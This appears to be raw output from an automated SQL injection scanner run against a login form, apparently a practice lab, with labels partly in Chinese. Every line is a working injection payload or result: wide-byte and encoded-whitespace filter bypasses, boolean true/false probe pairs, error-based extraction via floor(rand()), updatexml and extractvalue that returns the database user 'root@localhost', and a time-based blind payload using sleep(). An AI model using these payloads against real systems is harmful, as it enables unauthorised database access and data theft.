[+1+] SQL syntax  [1595] payload : [uname=123'&passwd=123&submit=Submit]
[+3+] SQL syntax  [1595] payload : [uname=123%df%27&passwd=123&submit=Submit]
[+5+] SQL syntax  [1595] payload : [uname=123\&passwd=123&submit=Submit]
[+14+] SQL syntax  [1597] payload : [uname=123&passwd=123'&submit=Submit]
[+16+] SQL syntax  [1598] payload : [uname=123&passwd=123%df%27&submit=Submit]
[+18+] SQL syntax  [1597] payload : [uname=123&passwd=123\&submit=Submit]
[$4$] 可能存在数字注入  [1536] payload : [uname=123%df%22&passwd=123&submit=Submit]
[$17$] 可能存在数字注入  [1536] payload : [uname=123&passwd=123%df%22&submit=Submit]
[+4+] SQL syntax  [1611] payload : [uname=123'/***/and/***/1/***/like/***/1/***/ &passwd=123&submit=Submit]
[+10+] SQL syntax  [1647] payload : [uname=123')/***/and/***/1/***/like/***/1/***/ &passwd=123&submit=Submit]
[+11+] SQL syntax  [1649] payload : [uname=123')/***/and/***/1/***/like/***/1/***/--+&passwd=123&submit=Submit]
[+12+] SQL syntax  [1647] payload : [uname=123')/***/and/***/1/***/like/***/1/***/%23&passwd=123&submit=Submit]
[+19+] SQL syntax  [1592] payload : [uname=123&passwd=123'/***/and/***/1/***/like/***/1/***/ &submit=Submit]
[+25+] SQL syntax  [1628] payload : [uname=123&passwd=123')/***/and/***/1/***/like/***/1/***/ &submit=Submit]
[+26+] SQL syntax  [1630] payload : [uname=123&passwd=123')/***/and/***/1/***/like/***/1/***/--+&submit=Submit]
[+27+] SQL syntax  [1628] payload : [uname=123&passwd=123')/***/and/***/1/***/like/***/1/***/%23&submit=Submit]
[+1+] SQL syntax  [1595] payload : [uname=123'&passwd=123&submit=Submit]
[+3+] SQL syntax  [1595] payload : [uname=123%df%27&passwd=123&submit=Submit]
[+5+] SQL syntax  [1595] payload : [uname=123\&passwd=123&submit=Submit]
[+14+] SQL syntax  [1597] payload : [uname=123&passwd=123'&submit=Submit]
[+16+] SQL syntax  [1598] payload : [uname=123&passwd=123%df%27&submit=Submit]
[+18+] SQL syntax  [1597] payload : [uname=123&passwd=123\&submit=Submit]
[+67+] SQL syntax  [1617] payload : [uname=123')/***/&&/***/1/***/like/***/1/***/%23&passwd=123&submit=Submit]
[+70+] SQL syntax  [1592] payload : [uname=123&passwd=123'%09&&%091%09like%091%09%23&submit=Submit]
[+72+] SQL syntax  [1610] payload : [uname=123&passwd=123')%09and%091%09like%091%09--+&submit=Submit]
[$4$] 可能存在注入  [1536] payload : [uname=123%df%22&passwd=123&submit=Submit]
[$17$] 可能存在注入  [1536] payload : [uname=123&passwd=123%df%22&submit=Submit]
[$42$] 可能存在数字型注入  [1536] payload : [uname=123%a0and%a01&passwd=123&submit=Submit]
[$44$] 可能存在数字型注入  [1536] payload : [uname=123%a0&&%a01|1&passwd=123&submit=Submit]
[$52$] 可能存在数字型注入  [1536] payload : [uname=123&passwd=123%a0&&%a01|1&submit=Submit]
[$53$] 可能存在数字型注入  [1536] payload : [uname=123&passwd=123%a0&&%a01||1&submit=Submit]
[$66$] 可能存在字符型注入  [1536] payload : [uname=123"%a0&&%a01%a0like%a01%a0--+&passwd=123&submit=Submit]
[$71$] 可能存在字符型注入  [1536] payload : [uname=123&passwd=123"%a0and%a01%a0like%a01%a0--+&submit=Submit]
[+1+] 字符型注入  [1523] payload : [uname=admin'%09and%091--+&passwd=123&submit=Submit]
[+5+] 字符型注入  [1523] payload : [uname=admin'%20and%201--+&passwd=123&submit=Submit]
[+8+] 字符型注入  [1521] payload : [uname=admin'%20and%201||1--+&passwd=123&submit=Submit]
[+51+] 字符型注入  [1521] payload : [uname=admin&passwd=123' xor 1--+&submit=Submit]
[+56+] 字符型注入  [1521] payload : [uname=admin&passwd=123'%0b%0c%0b%0dxor%0b%0c%0b%0d2<<1--+&submit=Submit]
[+60+] 字符型注入  [1435] payload : [uname=admin&passwd=123'%20xor%201^1%23&submit=Submit]
[+2+] SQL syntax  [1611] payload : [uname=admin'%0b%0c%0b%0dand%0b%0c%0b%0d1 like 1 &passwd=123&submit=Submit]
[+3+] SQL syntax  [1632] payload : [uname=admin'%09xor%09/*!and/*/**//*!/*!1*/--+&passwd=123&submit=Submit]
[+4+] SQL syntax  [1611] payload : [uname=admin' and {``1=1} &passwd=123&submit=Submit]
[+6+] SQL syntax  [1611] payload : [uname=admin' xor 2<<1 &passwd=123&submit=Submit]
[+7+] SQL syntax  [1611] payload : [uname=admin'%20and%201|1 &passwd=123&submit=Submit]
[+9+] SQL syntax  [1611] payload : [uname=admin'%0b%0c%0b%0dxor%0b%0c%0b%0d1&&1--+&passwd=123&submit=Submit]
[+31+] SQL syntax  [1619] payload : [uname=admin') and 1 &passwd=123&submit=Submit]
[+32+] SQL syntax  [1628] payload : [uname=admin')%a0and%a01 like 1--+&passwd=123&submit=Submit]
[+33+] SQL syntax  [1647] payload : [uname=admin')/***/xor/***//*!and/*/**//*!/*!1*/ &passwd=123&submit=Submit]
[+34+] SQL syntax  [1625] payload : [uname=admin') and {``1=1}%23&passwd=123&submit=Submit]
[+35+] SQL syntax  [1619] payload : [uname=admin')%09xor%091 &passwd=123&submit=Submit]
[+36+] SQL syntax  [1622] payload : [uname=admin') and 2<<1%23&passwd=123&submit=Submit]
[+37+] SQL syntax  [1627] payload : [uname=admin')%0b%0c%0b%0dxor%0b%0c%0b%0d1|1 &passwd=123&submit=Submit]
[+38+] SQL syntax  [1624] payload : [uname=admin') and 1||1--+&passwd=123&submit=Submit]
[+39+] SQL syntax  [1618] payload : [uname=admin') xor 1&&1%23&passwd=123&submit=Submit]
[+40+] SQL syntax  [1623] payload : [uname=admin')%20and%201^1--+&passwd=123&submit=Submit]
[+52+] SQL syntax  [1592] payload : [uname=admin&passwd=123'%20and%201 like 1 &submit=Submit]
[+53+] SQL syntax  [1611] payload : [uname=admin&passwd=123'%0b%0c%0b%0dand%0b%0c%0b%0d/*!and/*/**//*!/*!1*/%23&submit=Submit]
[+54+] SQL syntax  [1605] payload : [uname=admin&passwd=123'%a0xor%a0{``1=1}%23&submit=Submit]
[+55+] SQL syntax  [1599] payload : [uname=admin&passwd=123'%a0and%a01 &submit=Submit]
[+57+] SQL syntax  [1592] payload : [uname=admin&passwd=123'/***/and/***/1|1 &submit=Submit]
[+58+] SQL syntax  [1602] payload : [uname=admin&passwd=123'%a0xor%a01||1 &submit=Submit]
[+59+] SQL syntax  [1592] payload : [uname=admin&passwd=123'/***/xor/***/1&&1--+&submit=Submit]
[+81+] SQL syntax  [1600] payload : [uname=admin&passwd=123')%a0and%a01 &submit=Submit]
[+82+] SQL syntax  [1607] payload : [uname=admin&passwd=123')%a0and%a01 like 1 &submit=Submit]
[+83+] SQL syntax  [1620] payload : [uname=admin&passwd=123')%09xor%09/*!and/*/**//*!/*!1*/%23&submit=Submit]
[+84+] SQL syntax  [1606] payload : [uname=admin&passwd=123') xor {``1=1}%23&submit=Submit]
[+85+] SQL syntax  [1608] payload : [uname=admin&passwd=123')/***/xor/***/1%23&submit=Submit]
[+86+] SQL syntax  [1603] payload : [uname=admin&passwd=123')%09and%092<<1 &submit=Submit]
[+87+] SQL syntax  [1610] payload : [uname=admin&passwd=123')/***/xor/***/1|1%23&submit=Submit]
[+88+] SQL syntax  [1603] payload : [uname=admin&passwd=123')%09and%091||1 &submit=Submit]
[+89+] SQL syntax  [1599] payload : [uname=admin&passwd=123')%09xor%091&&1--+&submit=Submit]
[+90+] SQL syntax  [1610] payload : [uname=admin&passwd=123')%0b%0c%0b%0dxor%0b%0c%0b%0d1^1--+&submit=Submit]
[$13$] 可能存在字符型注入  [1536] payload : [uname=admin"%a0xor%a0/*!and/*/**//*!/*!1*/%23&passwd=123&submit=Submit]
[$14$] 可能存在字符型注入  [1536] payload : [uname=admin"%a0and%a0{``1=1}--+&passwd=123&submit=Submit]
[$24$] 可能存在字符型注入  [1536] payload : [uname=admin\%a0and%a0{``1=1}%23&passwd=123&submit=Submit]
[$30$] 可能存在字符型注入  [1536] payload : [uname=admin\%a0xor%a01^1 &passwd=123&submit=Submit]
[$48$] 可能存在字符型注入  [1536] payload : [uname=admin")%a0and%a01||1%23&passwd=123&submit=Submit]
[$67$] 可能存在字符型注入  [1536] payload : [uname=admin&passwd=123"%a0xor%a01|1 &submit=Submit]
[$68$] 可能存在字符型注入  [1536] payload : [uname=admin&passwd=123"%a0and%a01||1 &submit=Submit]
[$74$] 可能存在字符型注入  [1536] payload : [uname=admin&passwd=123\%a0xor%a0{``1=1}%23&submit=Submit]
[$95$] 可能存在字符型注入  [1536] payload : [uname=admin&passwd=123")%a0xor%a01 &submit=Submit]
[$99$] 可能存在字符型注入  [1536] payload : [uname=admin&passwd=123")%a0xor%a01&&1%23&submit=Submit]
{'payload': "uname=admin'%20and%20{``1=1}%23&passwd=123&submit=Submit-----uname=admin'%20and%20{``1=2}%23&passwd=123&submit=Submit", 'type': '字符型', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin'%0b%0c%0b%0dand%0b%0c%0b%0d2<<1--+&passwd=123&submit=Submit-----uname=admin'%0b%0c%0b%0dand%0b%0c%0b%0d0<<2--+&passwd=123&submit=Submit", 'type': '字符型', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123'%0b%0c%0b%0dxor%0b%0c%0b%0d1--+&submit=Submit-----uname=admin&passwd=123'%0b%0c%0b%0dxor%0b%0c%0b%0d0--+&submit=Submit", 'type': '字符型', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123'%20xor%201||1--+&submit=Submit-----uname=admin&passwd=123'%20xor%200||0--+&submit=Submit", 'type': '字符型', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin'&passwd=123&submit=Submit-----uname=admin'&passwd=123&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': 'uname=admin%df%27&passwd=123&submit=Submit-----uname=admin%df%27&passwd=123&submit=Submit', 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': 'uname=admin\\&passwd=123&submit=Submit-----uname=admin\\&passwd=123&submit=Submit', 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123'&submit=Submit-----uname=admin&passwd=123'&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': 'uname=admin&passwd=123%df%27&submit=Submit-----uname=admin&passwd=123%df%27&submit=Submit', 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': 'uname=admin&passwd=123\\&submit=Submit-----uname=admin&passwd=123\\&submit=Submit', 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin'%a0xor%a01 &passwd=123&submit=Submit-----uname=admin'%a0xor%a00 &passwd=123&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin'/***/xor/***//*!and/*/**//*!/*!1*/ &passwd=123&submit=Submit-----uname=admin'/***/xor/***//*!and/*/**//*!/*!0*/ &passwd=123&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin'/***/xor/***/1 &passwd=123&submit=Submit-----uname=admin'/***/xor/***/0 &passwd=123&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin'%a0and%a01|1 &passwd=123&submit=Submit-----uname=admin'%a0and%a00|0 &passwd=123&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin'%20and%201||1 &passwd=123&submit=Submit-----uname=admin'%20and%200||0 &passwd=123&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin'%09xor%091&&1 &passwd=123&submit=Submit-----uname=admin'%09xor%090&&1 &passwd=123&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin'/***/and/***/1^1 &passwd=123&submit=Submit-----uname=admin'/***/and/***/1^0 &passwd=123&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin')%0b%0c%0b%0dand%0b%0c%0b%0d1--+&passwd=123&submit=Submit-----uname=admin')%0b%0c%0b%0dand%0b%0c%0b%0d0--+&passwd=123&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin')%0b%0c%0b%0dxor%0b%0c%0b%0d1 like 1%23&passwd=123&submit=Submit-----uname=admin')%0b%0c%0b%0dxor%0b%0c%0b%0d1 like 2%23&passwd=123&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin')%0b%0c%0b%0dand%0b%0c%0b%0d/*!and/*/**//*!/*!1*/%23&passwd=123&submit=Submit-----uname=admin')%0b%0c%0b%0dand%0b%0c%0b%0d/*!and/*/**//*!/*!0*/%23&passwd=123&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin')%a0and%a0{``1=1} &passwd=123&submit=Submit-----uname=admin')%a0and%a0{``1=2} &passwd=123&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin') xor 1 &passwd=123&submit=Submit-----uname=admin') xor 0 &passwd=123&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin') xor 2<<1 &passwd=123&submit=Submit-----uname=admin') xor 0<<2 &passwd=123&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin')%a0and%a01|1%23&passwd=123&submit=Submit-----uname=admin')%a0and%a00|0%23&passwd=123&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin')%20and%201||1--+&passwd=123&submit=Submit-----uname=admin')%20and%200||0--+&passwd=123&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin')/***/xor/***/1&&1%23&passwd=123&submit=Submit-----uname=admin')/***/xor/***/0&&1%23&passwd=123&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin')%a0and%a01^1 &passwd=123&submit=Submit-----uname=admin')%a0and%a01^0 &passwd=123&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123'%a0xor%a0/*!and/*/**//*!/*!1*/ &submit=Submit-----uname=admin&passwd=123'%a0xor%a0/*!and/*/**//*!/*!0*/ &submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123'%20xor%20{``1=1} &submit=Submit-----uname=admin&passwd=123'%20xor%20{``1=2} &submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123'%09and%091 &submit=Submit-----uname=admin&passwd=123'%09and%090 &submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123'%a0xor%a02<<1%23&submit=Submit-----uname=admin&passwd=123'%a0xor%a00<<2%23&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123'%a0xor%a01|1 &submit=Submit-----uname=admin&passwd=123'%a0xor%a00|0 &submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123'/***/xor/***/1&&1--+&submit=Submit-----uname=admin&passwd=123'/***/xor/***/0&&1--+&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123'%09xor%091^1 &submit=Submit-----uname=admin&passwd=123'%09xor%091^0 &submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123')%09and%091 &submit=Submit-----uname=admin&passwd=123')%09and%090 &submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123')%0b%0c%0b%0dand%0b%0c%0b%0d1 like 1--+&submit=Submit-----uname=admin&passwd=123')%0b%0c%0b%0dand%0b%0c%0b%0d1 like 2--+&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123')/***/and/***//*!and/*/**//*!/*!1*/--+&submit=Submit-----uname=admin&passwd=123')/***/and/***//*!and/*/**//*!/*!0*/--+&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123')%a0xor%a0{``1=1} &submit=Submit-----uname=admin&passwd=123')%a0xor%a0{``1=2} &submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123')%20xor%201 &submit=Submit-----uname=admin&passwd=123')%20xor%200 &submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123')%a0and%a02<<1 &submit=Submit-----uname=admin&passwd=123')%a0and%a00<<2 &submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123')%a0xor%a01|1--+&submit=Submit-----uname=admin&passwd=123')%a0xor%a00|0--+&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123')/***/xor/***/1||1 &submit=Submit-----uname=admin&passwd=123')/***/xor/***/0||0 &submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123')/***/xor/***/1&&1 &submit=Submit-----uname=admin&passwd=123')/***/xor/***/0&&1 &submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': "uname=admin&passwd=123')%20xor%201^1%23&submit=Submit-----uname=admin&passwd=123')%20xor%201^0%23&submit=Submit", 'type': 'SQL syntax', 'success': 'True', 'waf': 'None'}
{'payload': 'uname=admin%df%22&passwd=123&submit=Submit-----uname=admin%df%22&passwd=123&submit=Submit', 'type': '', 'success': 'Maybe', 'waf': 'None'}
{'payload': 'uname=admin&passwd=123%df%22&submit=Submit-----uname=admin&passwd=123%df%22&submit=Submit', 'type': '', 'success': 'Maybe', 'waf': 'None'}
{'payload': 'uname=admin%a0xor%a01|1&passwd=123&submit=Submit-----uname=admin%a0xor%a00|0&passwd=123&submit=Submit', 'type': '数字型', 'success': 'Maybe', 'waf': 'None'}
{'payload': 'uname=admin&passwd=123%a0and%a01||1&submit=Submit-----uname=admin&passwd=123%a0and%a00||0&submit=Submit', 'type': '数字型', 'success': 'Maybe', 'waf': 'None'}
{'payload': 'uname=admin"%a0xor%a02<<1--+&passwd=123&submit=Submit-----uname=admin"%a0xor%a00<<2--+&passwd=123&submit=Submit', 'type': '字符型', 'success': 'Maybe', 'waf': 'None'}
{'payload': 'uname=admin"%a0and%a01&&1 &passwd=123&submit=Submit-----uname=admin"%a0and%a00&&1 &passwd=123&submit=Submit', 'type': '字符型', 'success': 'Maybe', 'waf': 'None'}
{'payload': 'uname=admin\\%a0and%a01--+&passwd=123&submit=Submit-----uname=admin\\%a0and%a00--+&passwd=123&submit=Submit', 'type': '字符型', 'success': 'Maybe', 'waf': 'None'}
{'payload': 'uname=admin")%a0xor%a0{``1=1}%23&passwd=123&submit=Submit-----uname=admin")%a0xor%a0{``1=2}%23&passwd=123&submit=Submit', 'type': '字符型', 'success': 'Maybe', 'waf': 'None'}
{'payload': 'uname=admin")%a0and%a01||1 &passwd=123&submit=Submit-----uname=admin")%a0and%a00||0 &passwd=123&submit=Submit', 'type': '字符型', 'success': 'Maybe', 'waf': 'None'}
{'payload': 'uname=admin")%a0and%a01&&1 &passwd=123&submit=Submit-----uname=admin")%a0and%a00&&1 &passwd=123&submit=Submit', 'type': '字符型', 'success': 'Maybe', 'waf': 'None'}
{'payload': 'uname=admin&passwd=123"%a0xor%a0/*!and/*/**//*!/*!1*/%23&submit=Submit-----uname=admin&passwd=123"%a0xor%a0/*!and/*/**//*!/*!0*/%23&submit=Submit', 'type': '字符型', 'success': 'Maybe', 'waf': 'None'}
{'payload': 'uname=admin&passwd=123"%a0and%a01 &submit=Submit-----uname=admin&passwd=123"%a0and%a00 &submit=Submit', 'type': '字符型', 'success': 'Maybe', 'waf': 'None'}
{'payload': 'uname=admin&passwd=123"%a0xor%a01||1--+&submit=Submit-----uname=admin&passwd=123"%a0xor%a00||0--+&submit=Submit', 'type': '字符型', 'success': 'Maybe', 'waf': 'None'}
{'payload': 'uname=admin&passwd=123\\%a0and%a0/*!and/*/**//*!/*!1*/--+&submit=Submit-----uname=admin&passwd=123\\%a0and%a0/*!and/*/**//*!/*!0*/--+&submit=Submit', 'type': '字符型', 'success': 'Maybe', 'waf': 'None'}
{'payload': 'uname=admin&passwd=123\\%a0xor%a01^1%23&submit=Submit-----uname=admin&passwd=123\\%a0xor%a01^0%23&submit=Submit', 'type': '字符型', 'success': 'Maybe', 'waf': 'None'}
{'payload': 'uname=admin&passwd=123")%a0and%a01 &submit=Submit-----uname=admin&passwd=123")%a0and%a00 &submit=Submit', 'type': '字符型', 'success': 'Maybe', 'waf': 'None'}
{'payload': 'uname=admin&passwd=123")%a0xor%a0/*!and/*/**//*!/*!1*/--+&submit=Submit-----uname=admin&passwd=123")%a0xor%a0/*!and/*/**//*!/*!0*/--+&submit=Submit', 'type': '字符型', 'success': 'Maybe', 'waf': 'None'}
{'payload': 'uname=admin&passwd=123")%a0and%a01||1%23&submit=Submit-----uname=admin&passwd=123")%a0and%a00||0%23&submit=Submit', 'type': '字符型', 'success': 'Maybe', 'waf': 'None'}
{'payload': 'uname=admin&passwd=123")%a0xor%a01^1 &submit=Submit-----uname=admin&passwd=123")%a0xor%a01^0 &submit=Submit', 'type': '字符型', 'success': 'Maybe', 'waf': 'None'}
{'type': '报错型', 'success': 'True', 'waf': 'None', 'payload': "uname=admin' and (select 1 from(select count(*),concat(0x5e5e5e,user(),0x5e5e5e,floor(rand(0)*2))x from information_schema.character_sets group by x)a)%23&passwd=123&submit=Submit", 'user': 'root@localhost'}
{'type': '报错型', 'success': 'True', 'waf': 'None', 'payload': "uname=admin' and (select 1 from (select count(*),concat(0x5e5e5e,user(),0x5e5e5e,floor(rand(0)*2))b from information_schema.tables group by b)a)--+&passwd=123&submit=Submit", 'user': 'root@localhost'}
{'type': '报错型', 'success': 'Maybe', 'waf': 'None', 'payload': "uname=admin' union select count(*),1,concat(0x5e5e5e,user(),0x5e5e5e,floor(rand(0)*2))x from information_schema.tables group by x --+&passwd=123&submit=Submit-----uname=admin' union select count(*),1,concat(0x5e5e5e,user(),0x5e5e5e,floor(rand(0)*2))x from information_schema.tables group by x --+&passwd=123&submit=Submit"}
{'type': '报错型', 'success': 'True', 'waf': 'None', 'payload': "uname=admin' and (updatexml(1,concat(0x5e5e5e,(select user()),0x5e5e5e),1))%23&passwd=123&submit=Submit", 'user': 'root@localhost'}
{'type': '报错型', 'success': 'True', 'waf': 'None', 'payload': "uname=admin' and (extractvalue(1,concat(0x5e5e5e,(select user()),0x5e5e5e)))%23&passwd=123&submit=Submit", 'user': 'root@localhost'}
{'type': '报错型', 'success': 'True', 'waf': 'None', 'payload': "uname=admin&passwd=123' and (select 1 from(select count(*),concat(0x5e5e5e,user(),0x5e5e5e,floor(rand(0)*2))x from information_schema.character_sets group by x)a)%23&submit=Submit", 'user': 'root@localhost'}
{'type': '报错型', 'success': 'True', 'waf': 'None', 'payload': "uname=admin&passwd=123' and (select 1 from (select count(*),concat(0x5e5e5e,user(),0x5e5e5e,floor(rand(0)*2))b from information_schema.tables group by b)a)%23&submit=Submit", 'user': 'root@localhost'}
{'type': '报错型', 'success': 'Maybe', 'waf': 'None', 'payload': "uname=admin&passwd=123' union select count(*),1,concat(0x5e5e5e,user(),0x5e5e5e,floor(rand(0)*2))x from information_schema.tables group by x %23&submit=Submit-----uname=admin&passwd=123' union select count(*),1,concat(0x5e5e5e,user(),0x5e5e5e,floor(rand(0)*2))x from information_schema.tables group by x %23&submit=Submit"}
{'type': '报错型', 'success': 'True', 'waf': 'None', 'payload': "uname=admin&passwd=123' and (updatexml(1,concat(0x5e5e5e,(select user()),0x5e5e5e),1))%23&submit=Submit", 'user': 'root@localhost'}
{'type': '报错型', 'success': 'True', 'waf': 'None', 'payload': "uname=admin&passwd=123' and (extractvalue(1,concat(0x5e5e5e,(select user()),0x5e5e5e)))--+&submit=Submit", 'user': 'root@localhost'}
{'type': '盲注', 'success': 'True', 'waf': 'None', 'payload': "uname=admin' and sleep( if( (select length(database()) = 8) , 5, 0 ) )%23&passwd=123&submit=Submit"}
